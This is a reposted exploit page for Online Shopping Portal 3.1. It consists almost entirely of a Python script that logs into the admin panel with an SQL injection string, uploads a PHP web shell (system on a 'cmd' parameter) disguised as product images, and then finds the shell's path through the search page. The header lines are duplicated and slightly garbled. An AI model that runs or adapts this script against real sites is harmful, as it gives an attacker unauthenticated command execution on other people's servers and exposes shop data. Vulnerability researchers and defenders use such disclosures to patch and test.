Online Shopping Portal 3.1 Shell Upload

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 143

# Exploit Title: Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)
# Date: 17.06.2021
# Exploit Author: Tagoletta (TaÄŸmaÃ§)
# Software Link: https://phpgurukul.com/s # Exploit Title: Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)
# Date: 17.06.2021
# Exploit Author: Tagoletta (TaÄŸmaÃ§)
# Software Link: https://phpgurukul.com/shopping-portal-free-download/
# Version: V3.1
# Tested on: Windows & Ubuntu

import requests
import random
import string

url = "http://192.168.1.3:80/shopping"
payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"

session = requests.session()

print("logining")

request_url = url+"/admin/"
post_data = {"username": "' OR 1=1-- a", "password": '', "submit": ''}
session.post(request_url, data=post_data)

let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))
randstr = ''.join(random.choice(let) for i in range(15))

print("product name is "+randstr)
print("shell name is "+shellname)
print("uploading payload")

request_url = url+"/admin/insert-product.php"
post_header = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryJNYN304wDTnp1QmE", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": url+"/admin/insert-product.php", "Accept-Encoding": "gzip, deflate", "Connection": "close"}
post_data = "------WebKitFormBoundaryJNYN304wDTnp1QmE Content-Disposition: form-data; name="category" 80 ------WebKitFormBoundaryJNYN304wDTnp1QmE Content-Disposition: form-data; name="subcategory" 8080 ------WebKitFormBoundaryJNYN304wDTnp1QmE Content-Disposition: form-data; name="productName" "+randstr+" ------WebKitFormBoundaryJNYN304wDTnp1QmE Content-Disposition: form-data; name="productCompany" Tagoletta ------WebKitFormBoundaryJNYN304wDTnp1QmE Content-Disposition: form-data; name="productpricebd" Tagoletta ------WebKitFormBoundaryJNYN304wDTnp1QmE Content-Disposition: form-data; name="productprice" Tagoletta ------WebKitFormBoundaryJNYN304wDTnp1QmE Content-Disposition: form-data; name="productDescription" Tagoletta ------WebKitFormBoundaryJNYN304wDTnp1QmE Content-Disposition: form-data; name="productShippingcharge" Tagoletta ------WebKitFormBoundaryJNYN304wDTnp1QmE Content-Disposition: form-data; name="productAvailability" In Stock ------WebKitFormBoundaryJNYN304wDTnp1QmE Content-Disposition: form-data; name="productimage1"; filename=""+shellname+".php" Content-Type: application/octet-stream "+payload+" ------WebKitFormBoundaryJNYN304wDTnp1QmE Content-Disposition: form-data; name="productimage2"; filename=""+shellname+".php" Content-Type: application/octet-stream "+payload+" ------WebKitFormBoundaryJNYN304wDTnp1QmE Content-Disposition: form-data; name="productimage3"; filename=""+shellname+".php" Content-Type: application/octet-stream "+payload+" ------WebKitFormBoundaryJNYN304wDTnp1QmE Content-Disposition: form-data; name="submit" ------WebKitFormBoundaryJNYN304wDTnp1QmE-- "
session.post(request_url, headers=post_header, data=post_data)

request_url = url+"/search-result.php"
post_data = {"product": randstr, "search": ''}
shellpath = str(requests.post(request_url, data=post_data).content).split("data-echo="admin/productimages")[1].split(shellname+".php")[0]

print(" path of shell= "+url+"/admin/productimages"+shellpath+shellname+".php")